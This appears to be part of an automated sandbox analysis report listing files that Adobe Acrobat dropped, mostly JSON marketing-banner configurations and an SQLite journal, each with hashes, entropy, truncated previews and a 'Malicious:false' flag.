                                                                                                                                                                                                                                                                                          Entropy (8bit):4.438906241625431
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:yeaci5GViBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1ZurVgazUpUTTGt
                                                                                                                                                                                                                                                                                          MD5:17A7FADF2731C18DD46730F5D3F98EC8
                                                                                                                                                                                                                                                                                          SHA1:87DE6B5E99942154796F3D0270CA6BA239CAD68A
                                                                                                                                                                                                                                                                                          SHA-256:EA8C19EEAFBB997CEF7F477D9D331841BB7103F8EEFD19C1494AD64C747C4F16
                                                                                                                                                                                                                                                                                          SHA-512:D6159BD2A494F8FD839B20C522EC478617E455350CF54B5AC131C544FD17EC74E9C4F65D0E6CB289D2F79A1BA1FC902B8C55EC567BCF0C1FF45A161E0DD55BAB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7767575467092915
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:7M2p/E2ioyVaRioy3DoWoy1CABoy1VaKOioy1noy1AYoy1Wioy1hioybioyvoy1T:7Zpjuw0iAkXKQuob9IVXEBodRBk8
                                                                                                                                                                                                                                                                                          MD5:966B0382CEC446D13A0ABD76DF9FD528
                                                                                                                                                                                                                                                                                          SHA1:D6CABE208D5015DF0EA078922AF38B9591342D14
                                                                                                                                                                                                                                                                                          SHA-256:A80F710945BA2EC2042303B4FADA7714F85AF6A9ABD61D330E9B327562AA9D93
                                                                                                                                                                                                                                                                                          SHA-512:6B1C2EFA758610653076B224C71E31B4859FA52A491AD1923365AF7DF162EB92A6D91FB3702D7685DCE8D1386074A280F1FB93B398197A31875D90CDE4700B88
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.... .c.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):295
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.376355666890404
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJM3g98kUwPeUkwRe9:YvXKX1Dc4WsdTeOHGMbLUkee9
                                                                                                                                                                                                                                                                                          MD5:E3E889AA0B9F3F6D9A3437301E64CE55
                                                                                                                                                                                                                                                                                          SHA1:EFD0F7C2C43C8B18344F72E380FE918CA5BD1835
                                                                                                                                                                                                                                                                                          SHA-256:2E14C63F716762394F5A49449A97FDF25DA5D8FE133D0192ADC2ACE8E8BC616A
                                                                                                                                                                                                                                                                                          SHA-512:BC2AF301D222DC495A77D3CB7F12063E460495DF32C222A8C1DA94D162833A1B238AB7A4A007D47EC9995F5C35739B1022106E5AD9E5EF9669649DA70327E594
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):294
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3106677497804435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJfBoTfXpnrPeUkwRe9:YvXKX1Dc4WsdTeOHGWTfXcUkee9
                                                                                                                                                                                                                                                                                          MD5:0E73282034129F1BB6942E6AAD64BCF3
                                                                                                                                                                                                                                                                                          SHA1:04FAE1B95295039333D64236ABBF5077D8C3A9A2
                                                                                                                                                                                                                                                                                          SHA-256:4AD40EBD993C9F07833B97E5E2CCDD786EF73F1A8D05A8C1E23381B83B50A1B7
                                                                                                                                                                                                                                                                                          SHA-512:A6C7BC6FAF4597998BAC8FA966F9D5F8D224C2356B983ADFD0E77D17433BF3225751A8FB897E35C5BE48B3FAE0A26E4C58AE21C10B69F5F70F523833CA6991ED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):294
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.289079423045305
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJfBD2G6UpnrPeUkwRe9:YvXKX1Dc4WsdTeOHGR22cUkee9
                                                                                                                                                                                                                                                                                          MD5:5498FD2424930B6226300CDC577B988F
                                                                                                                                                                                                                                                                                          SHA1:4DBD153D40FCF5E0A38E3DD51EF7ED8364FE7A93
                                                                                                                                                                                                                                                                                          SHA-256:DFE856A1A2F6C48FEFACB30331D508D3DA5940963817EDA55053C953A9B08B14
                                                                                                                                                                                                                                                                                          SHA-512:49AEB5C935E69D091B4F5B6A8EC3EEF4E86E9EDA176C8A7E1D7EA86C550F39F6E351FC567C9CEABEACC10253D52488BF7D4B834228939A4B9C703C4084C45F63
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):285
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.363689839539016
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJfPmwrPeUkwRe9:YvXKX1Dc4WsdTeOHGH56Ukee9
                                                                                                                                                                                                                                                                                          MD5:4B82F6F0C8CECB22089E4EC8A2EB8D7E
                                                                                                                                                                                                                                                                                          SHA1:957AB0FE95DA97AB407EC5C8012146B5E79AC988
                                                                                                                                                                                                                                                                                          SHA-256:04C010B8BE0D7C41C3CD23DD85915133C2973C58817A43D185280936D66A1128
                                                                                                                                                                                                                                                                                          SHA-512:0696A77314160A270FE114589372A0102474744089CD5930BE3CF69B33A0F36CA500B135827937894BE7EB09736C07F818CEBC4C689EE21C2C0491A3A23C53CF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.663732693596392
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Yv6X1Dc4WmeOMpLgEFqciGennl0RCmK8czOCY4w2J:YvaeDhgLtaAh8cvYv2
                                                                                                                                                                                                                                                                                          MD5:48D8C0AEF90F852E13C66623360E841B
                                                                                                                                                                                                                                                                                          SHA1:97A7EC17C4D96FD2BF9D750E61D2CAF6B477C0D0
                                                                                                                                                                                                                                                                                          SHA-256:9F99A9931A4B4C93C5D38200617B83E774D18F97126D5EB0D7021825F0B1D031
                                                                                                                                                                                                                                                                                          SHA-512:E89E86B484D419B2D7B2FAF5E260C67BCBB5746E1B077DB4676FCF333365704679CE6D2FA2AAC55B1BE8FAD84EE2D8BA977C0515AB4F238E8F18072EE36244FE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_2","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"afb9c2a3-eaf4-41f9-9d73-768e72f72282","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgZmlsZXMgdG8gYW5kIGZyb20gUERGXG53aXRob3V0IGxpbWl0cy4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingSc
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1050
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.651547060277916
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Yv6X1Dc4WmeOmVLgEF0c7sbnl0RCmK8czOCYHflEpwiVJ:YvaefFg6sGAh8cvYHWpws
                                                                                                                                                                                                                                                                                          MD5:D4BEB184126DFEFEFCB23D6BAB1EDCFE
                                                                                                                                                                                                                                                                                          SHA1:D84AD0180E82D088D2D3776C61CFB1BE8818C048
                                                                                                                                                                                                                                                                                          SHA-256:DF5EA647DF3B2CAC6B4E5BB46C01975520B838B6BFED5D388E30424B90912F7F
                                                                                                                                                                                                                                                                                          SHA-512:DD3D31AF8A52AAAF22002FE0B8AC2975759DBE22226F5459E669EB88E4A196108E3B668A3258C8DDC148805F1752CDC0222D6787855CF10AFD14230F63323289
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):292
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.298796271418549
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJfQ1rPeUkwRe9:YvXKX1Dc4WsdTeOHGY16Ukee9
                                                                                                                                                                                                                                                                                          MD5:4C3477ACED6FABB8D7EF2AE694FAAF71
                                                                                                                                                                                                                                                                                          SHA1:9F63A50F1B074BEB4203F3CF64406CD8C61D3277
                                                                                                                                                                                                                                                                                          SHA-256:B7BB5444923A70FC306417F9A7BD69275C984B39764D2146D2293E96B1BD981A
                                                                                                                                                                                                                                                                                          SHA-512:DF75909719B86E71AA51793600305E916694A1F698A15183E00B94D3B9E7C104A12B88989E74C7B77D16F4830CCF92733DB3C55A0479862B6A4E5EDA5B31EB01
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1038
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.64867277204339
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Yv6X1Dc4WmeOT2LgEF7cciAXs0nl0RCmK8czOCAPtciBJ:Yvaeuogc8hAh8cvA3
                                                                                                                                                                                                                                                                                          MD5:A3352768DD960F2FCEA7A7BA2E68611C
                                                                                                                                                                                                                                                                                          SHA1:8A092A71B819E3E365332E26267518FD0B38645E
                                                                                                                                                                                                                                                                                          SHA-256:5C1CA64FBEBE5F3986ECAAE0648B1E1414D1234096F07AE0F3B63F5428C6EBCE
                                                                                                                                                                                                                                                                                          SHA-512:7A2BCF38CD5F653199B9F7DBD08336C27D633483D63B0F40AE3A8C171919AC01FF56C804454C5B2A5FC708B60244D2CB43277178EAC667EC83C6B4097261CFCC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1164
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.697804284267246
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Yv6X1Dc4WmeOfKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5J:YvaeiEgqprtrS5OZjSlwTmAfSKj
                                                                                                                                                                                                                                                                                          MD5:23D86BF64002B531733713270663B6B7
                                                                                                                                                                                                                                                                                          SHA1:B517C984E45327F11E9D21A22ADE1F6B378BD4C0
                                                                                                                                                                                                                                                                                          SHA-256:87232363AE7233B0F2387FE4FBF1479A28EAE56F42711AF186CD02DE506FB76D
                                                                                                                                                                                                                                                                                          SHA-512:A3F699C2908C6C33705310AF6C16C8BD1F1C8DC99B214E87760F742338FB70DEAD1A2DDA586C8EAF6238BE61E83E377DDB1F71C4400A354C5721C8BB34EE9ED0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):289
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.302213416053114
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJfYdPeUkwRe9:YvXKX1Dc4WsdTeOHGg8Ukee9
                                                                                                                                                                                                                                                                                          MD5:EA97D0DDADC4808AD21F923098862024
                                                                                                                                                                                                                                                                                          SHA1:746293D4D063935C09676667299D424AD413ABB2
                                                                                                                                                                                                                                                                                          SHA-256:FE2B5276AEE81199554E253E89BE7565551EEF40975C4481D9592EAE98049078
                                                                                                                                                                                                                                                                                          SHA-512:4D392E377F654DF8D6CB7CC63E4C2DF27C991843A9BD1DFB7AB2177D2BF59E2C0E1B1F7CE234E7D2057B2B2BE919D5A8287FD806FD9A1FEC67D4285487773CD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1395
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.773718296319595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Yv6X1Dc4WmeOirLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNx:YvaehHgDv3W2aYQfgB5OUupHrQ9FJj
                                                                                                                                                                                                                                                                                          MD5:BA32D40590FBBBBE226DCE3B67880247
                                                                                                                                                                                                                                                                                          SHA1:8314178A4303600D766BA99BCCE717E0DE3898F8
                                                                                                                                                                                                                                                                                          SHA-256:813A33252C7EFE69743689B6D4E2B6F6E9177DE89932E059FA8A5A8CF61A3E6D
                                                                                                                                                                                                                                                                                          SHA-512:C8743EEAC581220556B10BFBE6D897753CBB882C8DD175ECC9C6B87BF322039B2C58BBAE3B9500652B77397093AE186184AEEFD64F036D873DFF602B9E94233F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2857453012455125
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJfbPtdPeUkwRe9:YvXKX1Dc4WsdTeOHGDV8Ukee9
                                                                                                                                                                                                                                                                                          MD5:34F8BAF019E7B3846A08BBF38476138B
                                                                                                                                                                                                                                                                                          SHA1:15EBC70F26B974687389CBFF986697A824B06033
                                                                                                                                                                                                                                                                                          SHA-256:B8B6F46FC086F8B82167A46897E7CDC56CDF05D47869E1448B66DA929C44DEA3
                                                                                                                                                                                                                                                                                          SHA-512:285299C645143AF51BB9C859638716A0BE88F3C4EF73AF634BB7724C8CC49902DED781DA0753B6A33E9C9E5C3ABCDD62C532A225E2AD468013C7E12E9B28268F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):287
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.290427390865315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJf21rPeUkwRe9:YvXKX1Dc4WsdTeOHG+16Ukee9
                                                                                                                                                                                                                                                                                          MD5:912A7D0438493FD978E62CBF42619D55
                                                                                                                                                                                                                                                                                          SHA1:F2E70F0CE25ABE82890A2DEFB2B5288FAA1EA31A
                                                                                                                                                                                                                                                                                          SHA-256:259B42A1EAB08E4E16CD40078E1F8DB6FF365B9346E88FF38F34A0503D89D9E0
                                                                                                                                                                                                                                                                                          SHA-512:5CC5E39B94DF991D1A50ECC7758BCC16EBD4E1AEEF70D65C60D62037E1932111C82C34C4FF65018A056C3FE3C206A2FA72C899B0425C40BADCA64F0FE6D963EF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1058
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.651186984227059
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Yv6X1Dc4WmeO4amXayLgEFRcONaqnl0RCmK8czOC+w2E+tg8BJ:YvaejBguOAh8cv+NKu
                                                                                                                                                                                                                                                                                          MD5:EDAE5A94902C867D1C1118FD7150E496
                                                                                                                                                                                                                                                                                          SHA1:E6327C5F159006293B57C651B3BC0AF3F554A3F8
                                                                                                                                                                                                                                                                                          SHA-256:72AC4BDCBF4D412CB77B38C84A739EA69F063F9843DBB428A483EAA8D605987D
                                                                                                                                                                                                                                                                                          SHA-512:6E17562B0AB4DC035033CB9ADC91E02CD152CAFF0005136D7ABF208C5869246A918B67E893320D4F1B2A948CF4BA3D677380A391A560A519F6C97E83ADEB2D2B
                                                                                                                                                                                                                                                                                          Malicious:false
